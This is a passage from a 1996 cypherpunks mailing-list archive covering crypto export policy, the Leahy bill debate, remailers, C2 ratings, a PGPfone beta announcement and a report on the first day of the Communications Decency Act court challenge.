ruled unconstitutional. (Source: private conversation with Carl Nicolai,
inventor of the PhaserPhone, suppressed by a Patent Secrecy Order, who was
allowed, with his lawyer, to look through certain legal papers at NSA
headquarters. He encounterd memoranda to the effect that an ITAR challenge
would likely see the ITARs thrown out. I communicated this information to
Phil Karn and the EFF a couple of years ago.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sat, 23 Mar 1996 06:58:12 +0800
To: cypherpunks@toad.com
Subject: Free speech debate on MSN Encarta
Message-ID: <31521BDF.49EEA1D4@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


First, a heads-up on the free speech debate on MSN Encarta this month. I
found out about it because it was featured (sans URL, of course) on the
NBC Nightly News. Here's the URL they missed:

      http://www.msn.com/encarta/otr/mar/otthis.htm

One of the major axes of debate is whether programs like SurfWatch are
sufficient to keep pornography out of the hands of children. One concern
that was raised more than once is that children tend to be more
technically sophisticated ("computer-literate") than parents. I think
there is a point there.

My dad just got Internet access this afternoon. Basically, all he needed
was to install a PPP dialer and Netscape on his Mac, but it was a bit
too much for him, so he had a friend come over and help him out. I had
tried to guide him over the phone, but that just didn't work out (among
other things, Netscape really needs to change their "DNS failure on the
following hosts" error message to "you don't have a connection to the
Internet, dummy"). Adding SurfWatch or something similar might not have
been possible at all.

So here's a random idea: have an ISP that essentially firewalls the
Internet connection to the house, so that it is very difficult to get
unwanted stuff over the wire at all. The ISP can maintain and update the
latest high-tech tools, including filtering by URL, filtering by
keyword, and other stuff like detecting proxies. While they're at it,
they can filter out junk email.

Just a random thought.

Raph (whose son, Alan Mathison, was born Sunday morning at 5:01 am)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 22 Mar 1996 18:39:41 +0800
To: asgaard@sos.sll.se
Subject: Re: Tim's friend's mildly retarded son
Message-ID: <01I2M0WLQM7Q8ZDWL7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"asgaard@sos.sll.se"  "Asgaard" 15-MAR-1996 14:06:44.11

>The reason FDA has not approved this drug is most probably because
>it does not make mildly retarded boys less retarded. But of course,

	Actually, there is some evidence that nootropics do work. I've been
doing a literature review on the subject (soon to be a full meta-analytic
review if I can find the proper statistics for combining multiple results from
the same study), and there is some evidence for them working... slightly.
	The lack of FDA approval can be described as being due to a combination
of three factors:
	A. Most sucessful studies of such drugs have been on healthy
individuals. (For instance, vasopressin only appears to work on those whose
brains are reasonably intact in the portion that deals with memory; I find this
unsurprising). However, the FDA refuses to approve drugs for the purpose of
enhancement of normal humans. (They have the excuse that it's against their
charter). They even include the decline of IQ with aging in this category,
unless it's profound or associated with other problems.
	B. Most of the known to work nootropics, etcetera are beyond the
patent period. Thus, the well-researched ones tend not to be profitable for
a company to work on getting through the FDA. Instead, they're developing new
ones... often with a concentration (as with hydergine) on drugs to treat
senile dementia or other categories that the FDA _will_ approve.
	C. The FDA is notoriously conservative. I'm generally willing to trust
anything they pass as safe and (at least marginally) effective, but that's
because they're completely anal-retentive about the whole business. Anything
they're willing to pass without serious political pressure (of the types
mentioned in another post) is OK... it's just that they don't pass a lot of
stuff that is OK.
	This topic's relevance to Cypherpunks, aside from the confirmations
that you mentioned, is low... aside from that it's of interest to Extropians
such as myself and Tim May.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Fri, 22 Mar 1996 22:59:31 +0800
To: Charles Gimon <gimonca@skypoint.com>
Subject: Re: Minneapolis Star Tribune this morning
In-Reply-To: <Pine.SV4.3.91.960321113224.9485A-100000@mirage>
Message-ID: <3151F296.1331@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Charles Gimon wrote:
> Mpls. Strib did a piece this morning, front page, about AltaVista,
> Dejanews, etc. Well-worn territory to readers of this list. Your
> words can come back to haunt you, all that stuff. One paragraph that
> deserves rebuttal from those of you who are better-informed:
> 
> "Of course, technology is working on solutions to itself, but
>    mechanisms that would hide the name of a message's author, such as
>    cryptography and anonymous remailers, are convoluted and incomplete."

Rebuttal? Why?  Remailers generally are.  There aren't enough penet.fi 
type remailers, which people prefer not only because there is a mapping 
but because it's easier to use.  (It's also a bit more secure if there
are c2-nym remailers mapped to penet.fi type remailers in various
countries).

Not everyone is on a system that is PGP-friendly.  Handling PGP-messages
from commercial services or even most mailer apps is awkward at best,
and the commands for mixmaster/c'punk remailers are not as standard as
they could be.  (A PGP3 DLL would improve the use of crypto and anon-
remailers quite a bit.)

>From the excerpt you posted, it doesn't seem as if they were criticizing
remailers... which is a pretty good thing.

> 
> Author was Jonathan Gaw; no e-mail address given. Star Tribune Online
> is at http://www.startribune.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 22 Mar 1996 23:18:38 +0800
To: stewarts@ix.netcom.com
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <01I2M16O9GGG8ZDWL7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 16-MAR-1996 01:55:32.07

>Depending on the details of Ian's method, I don't think the debate
>needs to be taken to the public, or even done - it may simply be a
>done deal once the technology's out there.  If Mark Twain Bank or
>Merita Bank or the Federal <Exonive-Deleted> Reserve wants to offer
Digicash(tm) with Payee-Non-Anonymity, they can always make it a contractual
>requirement that their payees not use anonymity techniques in return for
>being paid.

	Wouldn't the viability of such a clause depend on the anonymizing
scheme in question? If the bank's cooperation isn't needed (i.e., going through
a proxy), then such a limit would be empty.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 23 Mar 1996 06:56:57 +0800
To: cypherpunks@toad.com
Subject: Re: Tim's friend's mildly retarded son
Message-ID: <ad7751470e02100485e7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 PM 3/21/96, E. ALLEN SMITH wrote:

>        This topic's relevance to Cypherpunks, aside from the confirmations
>that you mentioned, is low... aside from that it's of interest to Extropians
>such as myself and Tim May.

In recent months, a self-appointed group of list members have taken upon
themselves to argue that _anything_ that does not have to do with certain
topics they find appropriate is "not related to crypto, so take it
elsewhere." Regrettably, most reasonable people have grown quiet about
anything that smacks of politics or ideology, leaving the field clear for
certain ranting lunatics.

While I agree that the Cypherpunks list is not a libertarian or socialist
theory discussion area, the fact is that crypto is tied intimately to
incredibly important policy and jurisprudential areas. The early meetings
were not held, and the list was not formed, solely to debate the merits of
3DES vs. IDEA or other crypto arcania, for which sci.crypt and
sci.crypt.research already existed.

The link between the FDA and crypto is not as much of a reach as some might
think. When a government passes what are the equivalent of "dietary laws"
(what one may eat, drink, etc.), even if based on supposed studies, this is
a major limit on personal freedom.

Would members of this list support an FDA-like organization passing
judgement on which algorithms are considered "safe and effective" (and by
whose standards?)?

I mentioned my friend's detour to Mexico to obtain medicine for his son in
passing, not to distract the list. I feel, however, that anyone who argues
that a group of bureacrats and lawyers in Washington, D.C. have the "right"
to send someone to jail for eating something they have decided is evil
should reconsider their committment to this position.

I have no problem with people deciding that certain foods or herbs or
medicines are not to their liking, or are "snake oil," but I have a real
problem with them raiding the houses of those who think differently and
seizing their property, sending them to prison, etc.

Think of the parallels to crypto. Believe me, I don't even want the bozos
at IPG to be enjoined from selling their snake oil. Suckers are born every
minute, as IPG knows, and I have to think of it as evolution in action.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 23 Mar 1996 06:58:29 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
In-Reply-To: <Pine.SUN.3.91.960321180535.24730A-100000@polaris.mindport.net>
Message-ID: <199603220237.UAA01376@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> It's even deeper than this really.  Opponents of the bill say it says X.  
> Supporters of the bill say it says Y.  The bill actually sounds more like 
> X than Y.  There is very little incentive to make the bill anything like 
> Y.  The bill could probably be a straight forward X and still pass.

This will probably be unpopular, but:

There has been a defacto toleration of some cheap arguments in many online
forums dedicated to crypto discussions, including this one.  People who
agree with us are brave freedom fighters, and our enemies are evil people
who want to take everyone's freedoms away. 

There are honest, intelligent, and well informed people on both sides of
the Leahy bill here on this list.  We are appalled, rightfully so, when
Schneier, Blaze, et al are smeared by anonymous posts dencouncing their
characters and calling for mailbombings.  But we shouldn't be surprised --
those tactics have been used repeatedly during the larger crypto debate.
Remember when Bizdos was the anti-christ?

I think we'd all be better off if people like Denning felt that they could
come online and mix it up with the rest of us without worrying about being
shouted down or harassed.  I remember when she used to answer questions on
sci.crypt with some regularlity.  Say what you want about her politics, 
she wrote a good crypto textbook and she's good at teaching.  There'd be 
more people who know their crypto if she was still hanging around.

Arguing exclusively against straw men isn't good for us.  It lets us 
slide by with weaker arguments than good opponents would coax from us, 
and it hurts our ability to repsond effectively to their arguments.

Crypto technology is going to effect society in lots of ways, some blunt
and others subtle.  It's complicated stuff, and intelligent people can 
disagree without being evil or in cahoots with the forces of tyranny.  
There's a line from an old Neil Young song -- even Richard Nixon has got 
soul.  Well, so does Dorothy Denning, and so do the people at the NSA, 
and the management at AT&T.

Those who would restrict crypto are wrong, and if they prevail in the
debate they will do a lot of damage, and yes, they will end up depriving 
us of a big part of our liberty.  But to them *we* are doing a lot of 
damage -- we're creating a dangerous and lawless world where personal 
safety will be nothing but a dim memory.

Who's right?  How can you tell?  With an open and honest debate between
their best people and ours.  I am absolutely certain that we would prevail
in such a debate.  But we can't get together to stage such a thing -- here
on our home turf they're not welcome, and we're certainly not welcome at
the security briefings, or whatever it is they call it when the feds lobby
lawmakers about crypto issues. 

I do not mean to imply that any of the leading figures here on cypherpunks
stoop to character assination and harassment.  But there has been what
seems to me to be an effort to romanticize the issue, create a sort of
counter-culture fervor.  There is a tendency to shout and protest rather
than to argue and persuade.  Unthinking intolerance of dissent is common
among a lot of the transient people on the list, as is a bias against
people affiliated with large companies.

All I'm suggesting is that the next time somone get creamed for saying 
something unpopular, that maybe we should defend their right to say it, 
as long as they say it well and honestly.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Fri, 22 Mar 1996 23:21:15 +0800
To: Greg Kucharo <sophi@best.com>
Subject: Re: A funny story [noise]
Message-ID: <9603220452.AA03455@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>... someone had left thier keys in the door lock. 
> So being the good cypherpunk that I am I jumped out and grabbed the 
>keys from the lock, then knocked on the window. The passenger rolled 
>down the window and accepted the keys back. Much to my surprise the 
>passenger was none other than Whitfield Diffie.

Let me get this straight.  You performed a key exchange with
Whitfield Diffie?  His keys were publicly available, and you 
securely transferred them back again?  What a concept!
Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Mar 1996 17:18:21 +0800
To: cypherpunks@toad.com
Subject: Re: Shameless
Message-ID: <199603220533.VAA29847@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy wrote:
>Actually, I doubt Mr/Ms Anonymous is a provocateur.  Reads more
>like a paranoid schitzophrenic to me.  Dollars to donuts says 
>it's Detweiler.

Doesn't matter if it's Detweiler; what matters is whether it's detweiling....


#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Mar 1996 23:31:47 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <199603220533.VAA29930@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 3/21/96 -0800,  David Loysen <dwl@hnc.com> wrote:
>>The fine print says its insecure as soon as its connected to a network. 
>Ain't nothing fine about that print. An operating system or piece of
>hardware may be C2 certifiable. But only a complete system in a specific
>configuration can be certified as C2 compliant. The way I read the orange
>book, no system with a network connection can ever be C2. 

A system with a network connection _can_ be C2 or higher rated - *if* 
it can adequately verify that it knows who its users are.  That's hard,
but it's doable, if it restricts access to a limited set of users,
and has enforcement mechanisms to support it.  For instance, connection
over an encrypted, crypto-authenticated LAN which can enforce session
ownership or trustably label all data packets could work; you'd typically
do that with some kind of wrapper over IP or TCP and a bullet-proofed OS
interface.

It's far cleaner if you can do networking in user space rather than the kernel;
I think the UUCP-equipped configurations for AT&T's B1-rated System V/MLS
were part of the rated configuration, though it's been a while since I've
been near that world.  It's also easier if you limit each system (or at
least level)
to one local user per machine so machine ID tells you user ID.  Compartmentd
Mode Workstations were just coming out when I last did that stuff, so I
don't know quite how much of the Red Book they implement, but they had
goals of supporting networked above-B1 computing.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Mar 1996 23:37:08 +0800
To: cypherpunks@toad.com
Subject: Re: Dorothy Denning attacks Leahy's crypto bill
Message-ID: <199603220533.VAA29941@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, wait, are Jim Bell and I supposed to be in fairly complete agreement
on something?  :-)
At 12:09 AM 3/20/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>At 09:45 PM 3/19/96 -0800, Declan McCullagh wrote:
...
>>From: denning@cs.cosc.georgetown.edu (Dorothy Denning)

>"Far easier"?  That's an odd statement, because the export of encryption is 
>easy with or without restrictive laws.  How much trouble is a "criminal or 
>terrorist" going to risk by violating a few measly export laws?  

It probably would make it much easier for Designated Scary People to 
use crypto without having to take special precautions.  If IPv6 security
was part of the standard Microsoft Win2000 networking stack (ok, without major
botches, and with a convenient user interface :-), and PGPphone came on
the Soundblaster N+1 installation disk, all those tax-evaders and pharmaceutical
wholesalers and, and, and father-rapers could talk to their accountants in
private
and chat with each other about tax-evadin' and father-rapin' and _crime_,
and it'd be much harder to Federalize their money and arrest their clients.
And a lot of that probably won't happen if Microsoft and Soundblaster have to
make domestic and international versions of their software.

>>I am concerned that the proposed legislation responds only to a loud
>>cry for assistance and is not the reasoned and practiced position of
>>our multinational corporations.

Well, certainly not the position of MNCs who are big players in the
military-industrial complex.  But what's this _our_ terminology?
In particular, cryptography offers the only technical defense against the
ability of computers to centralize and correlate information from many sources,
which is one of the primary threats to personal privacy today,
and MNCs are generally supportive of centralizing any information they can.

>> At the International Cryptography
>>Institute, which I chaired in September 1994 and 1995, our discussions
>>did not find that this unrestricted distribution of encryption
>>technology was required to satisfy business objectives. 

Well, I'd expect not.  It wasn't exactly an unbiased crowd; there were a 
couple people there on Our Side, but it was largely people who agreed
with Dr. Denning on the political objectives, and the business contingent
included companies like TIS which _sell_ so-called escrow software.

>

>Notice that we've already established that this bill in no way produces an 
>"unrestriction distribution of encryption technology."  Wish it did, but it 
>doesn't.
Yeah.


>>The Commerce/NSA study did acknowledge that the existence of foreign
>>products claiming strong encryption could have a negative effect on
>>U.S. competitiveness.  However, by allowing encryption services to be
>>sold separately from the applications software that uses them, CAPIs
>>will make it extremely unlikely that general-purpose software will be
>>substantially effected by export controls.

Which side is Dr. Denning _on_ here?  At present, software using CAPIs
is not exportable under the ITAR, since the CAPI is a "component of a 
munitions system"; is she now advocating legalized export of software
using government-approved CAPIs only?  


>Notice that she seems to be making policy for the government, yet again.
She seems to have been the big public advocate of it for years....


>>Export controls are often blamed for the lack of security in our public
>>infrastructure. 

Sure - the fact that Microsoft Office built-in file protection
isn't even up to RC4/40 standards isn't primarily the fault of export controls,
but the lack of a clearly defined official export standard doesn't _help_ them
make a business case for including good encryption.


>>Encryption policy is a difficult and often emotional issue. 
>
>It's only emotional because of malicious and counter-productive efforts by 
>government, and government suck-ups like Denning.

She certainly hasn't helped, and she's aided and abetted and provided
assistance to the folks like Freeh who want to stop free speech and privacy,
but it's also emotional because many of us really don't want our privacy
compromised and our freedom of speech restricted.  The Bill of Rights
isn't perfect, but it's far better than what the government is using today,
and it's got provisions like the 9th and 10th amendments to remind readers
that it's just a set of examples of civil rights, not an exhaustive inventory.



>>I will be pleased to meet with you and the committee for comment and
>>questioning, or to assist in any way I can with the development of a
>>balanced approach to encryption legislation.

I've always enjoyed discussing issues with people who offer an
outrageously extreme set of proposals, then back off to a still offensive
level and call it "balanced".  The status quo already gives too much 
effective power to the government, and she's proposing to give in
where it the alternatives are unenforceable and strenghten her position
where there's new power to be seized.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Mar 1996 17:09:45 +0800
To: cypherpunks@toad.com
Subject: Re: IPG message
Message-ID: <199603220533.VAA29988@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Seymour, TX Snake Oilers just keep getting better all the time,
now that they've left Houston, or was it Boulder!
Goat-getting hype about "What is specially claimed as copyrighted and or
patentable"
(blatantly incorrectly using those terms, and forgetting to include trademarks),
several amusing new product names, bombastic claims about speed and
strength, anecdotes about things he heard Dr. Von Neumann Himself say,
and a sum-of-Linear-Congruential generators algorithm which is
not only breakable but far slower than RC4 or RC5 or OTPs about which
he's said less recently than before.
And hardware random number generators achieving multiple
megabytes per second of random numbers on a simple serial port!

>Note: The zipped files are considerably larger than the original 
>      because they are random unzippable data files.

UnAuTHorIZed ReproDUCTion and DIS-SEMINATION Are STRICTLY ProHIBiTeD!
Yee-Hah!

P.S. Ralph - you now owe us the keys to your company (Percy still gets his 10%),
plus all your remarkably copious Slack!

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Mar 1996 17:16:23 +0800
To: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Subject: Re: Electronic Frontiers Houston Cyber-Political Questionaire.
Message-ID: <199603220533.VAA00116@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>FOR IMMEDIATE RELEASE
>Electronic Frontiers Houston Cyber-Political Questionnaire.

I'm not currently a candidate, though I've had the pleasure of running
for Congress as a Libertarian a couple of times, and I'd like to comment
on some of the issues.

>Please answer the questions on the reverse side.  Attach additional pages
if required.
Hmmm - that'll be a bit tough on line.  Got any spare anti-electrons?
I could run it through rot-13 :-)

>1. Do you think that electronic publishing should enjoy the constitutional
>protections that accrue to print media?
>2. Do you think that electronic publishing should enjoy the constitutional
>protections that accrue to broadcast media?
>3. Do you think that electronic publishing should enjoy the constitutional 
>protections that accrue to libraries?

The Bill of Rights was a good start, but courts have seriously mishandled it
over the past 200 years, whether to support the public mood on an upcoming
war (as in the Schenk (sp?) case, which gave us the appallingly misused
"fire in a public theater" dictum), or to permit censorship of speech that
offends the popular morals, or to support oligopolies through restricting
access to radio and TV broadcasting to government-approved companies.
I tend to agree with Hugo Black's position that the people who wrote
"Congress shall make no law...." meant what they said.
In particular, even supposing, as Holmes did, that there are types of
speech so offensive and valueless as to not be protected by the First Amendment,
the Constitution also doesn't specifically empower them to ban it either.

>4. Do you favor new laws to regulate the content of electronic media?
Yes - there's a lot of old law and FCC regulation that needs to be repealed,
and that takes new laws.

>5. Do you think that the First Amendment rights of free speech protect 
>private use of encryption?
First, Second, Fourth, Fifth, Ninth, Tenth

>6. Do you favor laws to regulate the private use of encryption?
Nope.

>7. Do you agree with restrictions on the export of technology that 
>incorporates cryptography?
No - nor of other technology, either.

>9. Do you support the right of a private individual too publish printed 
>materials anonymously?
Not only do _I_ favor it, the Supreme Court also supports it.
Electronic materials as well.

>10. Should the government play a role in providing access to computer 
>networks?
Yes and No.  Governments have a role to play in providing access to
existing government-run systems that have public information.

>11. Do you think that the government should guarantee universal 
>access to computer networks?
No.  Government-provided services are government-controlled services.
And governments can't guarantee services - they can only force people 
to buy them (with their own recycled money) from pro-government providers, 
while interfering with competing technologies and services that the
market would otherwise provide.  From a Liberal perspective, Internet
access is already available on the open market for less than the cost
of cable TV, in most of the country - trading government control of the
most important media of the next two decades for the cost of a half-pack
of cigarettes a day per citizen would be a really bad choice.

>12. Do you think that access to government computerized information 
>is a right?
>13. Should all governmental records that are available to the public be 
>made available via computer resources?
>14. Should access to computerized governmental records be free?

Not strictly - the public does own most of the government's information,
but providing subsidized access to it isn't an appropriate use of tax money.
Providing at-cost access certainly is, for information that the government
should be giving out, and restricting distribution of that information
or giving monopoly access to rent-seeking private companies certainly is wrong.

But there's a lot of information the government has today that it shouldn't -
people's private data that they've been forced to provide to bureaucrats,
or information that wasn't quite as forced such as census data.  
Most of that data should be destroyed.  And there are difficult questions,
such as how to reveal details on CIA/NSA/FBI abuses without violating
the privacy of people they spied on or interefered with.

>15. Should the government regulate electronic financial transactions 
>and require traceability?
Of course not.  (I do distinguish between banning fraud and embezzlement,
which is arguably a reasonable government function, and regulating the 
communications often used in those activities.)

>16. Do you approve or disapprove of the wiretap provisions in the 
>1994 Digital Telephony bill?
Disapprove.

>17. Do you favor expanding law enforcement access to telephonic 
>communications?
Sure - cops need phones, too.   And access to the communications
of other government officials to investigate crime and corruption
in government is mostly safe.  But demanding access to citizens' private 
communications is not only _far_ outside the bounds of government's
legitimate access and a bare-faced grab for political power
by the folks who brought us COINTELPRO and J Edgar Hoover's files,
but is a call to violate individuals' rights to use whatever tools
they want to protect their privacy to support their power-grab.
And they've been so _disingenuous_ about it...


>In addition, candidates for national office will be asked the
>following additional question:
>18. Do you favor legislation which would require a national ID card?

No - I favor legislation to eliminate the half-way measure we have,
the single "Social Security" tax-id Number, and, until we eliminate
privacy-invasive taxes altogether, give taxpayers a large group of
numbers so they don't have to give everybody a universal identifier
just to pay their taxes.

>Candidates for state office will be asked the following question:
>18. Should laws requiring fingerprints to acquire/renew drivers licences 
>be repealed?

Yes, as should driver's licenses and other mandatory ID.

>Electronic Frontiers Houston is a non-profit group that supports civil 
>liberties and the development of culture in cyberspace.

While I don't live in Houston, I've been a member and usually
a supporter of EFF.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sat, 23 Mar 1996 06:55:35 +0800
To: cypherpunks@toad.com
Subject: New Beta Test of PGPfone available WINDOWS '95 Included!
Message-ID: <9603220251.AA29117@big-screw>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
alt.security.pgp, sci.crypt)

-----BEGIN PGP SIGNED MESSAGE-----

We have finally released a Windows '95 version of PGPfone. This release
includes PGPfone for Macintosh version 1.0b6 and PGPfone for Windows '95
version 1.0b1. Note: The Macintosh version does not talk to earlier versions.
However the Macintosh and Windows version talk to each other!

Connections can be either via modem or the Internet.

Note: This code is beta test code. Future changes may continue to be
incompatible with these versions.

Also Note: We are now only distribution PGPfone via the World Wide Web, we
have shutdown the PGPfone FTP site. To get PGPfone over the Web, go to
the PGPfone home page at:

        http://web.mit.edu/network/pgpfone

WE CAN ONLY DISTRIBUTE PGPFONE TO U.S. PERSONS AND CANADIAN CITIZENS.

                                  -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVIVssUtR20Nv5BtAQHMLAQAnP6vw+vSwqtvY20T9wjEbSn8jafaUjc2
NPJThVLs9YL0GfuOb0LICJk4I+1W51cJG5CU7McC2gxFSm9DqBmqaemcPUrepY+8
x9WAIUnRI0zhInwOSk7XeRNZLuosve/qruj/OVkttSg4sGo39ZOM43iihSIcwvT/
AeyHbZEKT44=
=XqHc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 22 Mar 1996 17:33:55 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Day #1
Message-ID: <Pine.SUN.3.91.960321220018.14484B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain





-----------------------------------------------------------------------------
                           The CDA Challenge, Day #1
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

March 21, 1996


PHILADELPHIA -- In the shadow of the Liberty Bell in downtown
Philadelphia, the future of online liberty is being decided.

I arrived halfway through the first day of the hearing in our lawsuit
challenging the Communications Decency Act. Overall, it went well,
though there were a few surprises, like a series of computer crashes
and the Department of Justice's embrace of the rhetoric of crusading
anti-porn activist Catharine MacKinnon.

But most importantly, the judges are engaged in the case. CDT
installed a T1 line, which is the first time a courtroom has had a
live net-connection -- judges tend to insist on paper. When Ann Duvall
of SurfWatch demoed the web and her software this afternoon, the
judges paid attention, asked questions, and were proud when they
figured out the concept of a hierarchy of pages on a web site.

Her demonstration wasn't without problems. The Macintosh laptop she
used to demonstrate Netscape and SurfWatch crashed three times as
Duvall tried to click on the Philadelphia Phillies web site. (A great
idea, though -- at least one judge appeared interested in the team.)
Jonah Seiger and the other CDTers fixed the problem quickly, but then
net.latency prevented Duvall from accessing the Louvre or Playboy web
sites. Penthouse worked properly, though: "Blocked by SurfWatch."

As I'm typing this, I saw a mention that a local television station, WCAU
News 10, is going to broadcast a special on the hearing early tomorrow
morning. Today's press corps included CNN, CBS, NBC, the Washington Post,
the New York Times Online, the Philadelphia Inquirer, the Los Angeles
Times, and plenty of local reporters. 

The most interesting witness might have been Dr. William R. Stayton, a
psychologist and sex therapist who testified that minors were not
necessarily harmed by sexually-explicit materials. Stayton is an
American Baptist minister, and holds faculty appointments at LaSalle
and the University of Pennsylvania.

The DoJ's only female attorney present cross-examined Stayton,
spinning her arguments around a twisted MacKinnon-esque logic that
I've never heard even from honorary net.mascot Senator James Exon.

Seems as though she wasn't just trying to establish that nekkid photos
are *harmful to minors* -- she was trying to establish that they're
*harmful to women.* She asked questions like:

  "Do these pictures depict a healthy view of women as sexual beings?"

  "Do you believe the pictures are a factor in leading minors to view
  women as sex objects?"

  "Do you believe that these pictures are part of a socialization
  process that depicts women as sex objects?"

Stayton rallied, replying:

  "There's nothing inherently harmful about letting a six-year old view
  these images."

Undaunted, DoJ counsel continued, quoting from the Attorney General's
1986 Commission on Pornography, page 343, entered into evidence as
exhibit 80. Seems as though that section talks about how nonviolent
and nondegrading sexual materials are still harmful to minors.

Chris Hansen from the ACLU on redirect asked: "Why is it not harmful
for minors to access sexual materials?" Stayton: "We are born sexual
beings... Our children are bombarded with sexuality on all sides...
50% of kids are sexually active by 15-16 years old. 85% are active by 18."

To illustrate their point, the DoJ showed the judges and Stayton
examples of dirty pictures taken from the Internet, complete with
URLs. The pictures were _not_ hardcore; they seemed to consist of solo
naked women in various lewd and explicit poses. The DoJ did this to
demonstrate the types of _nonobscene_ materials available online that
they would be unable to prosecute without the CDA.

I would report in more detail on the types of images, but as I and
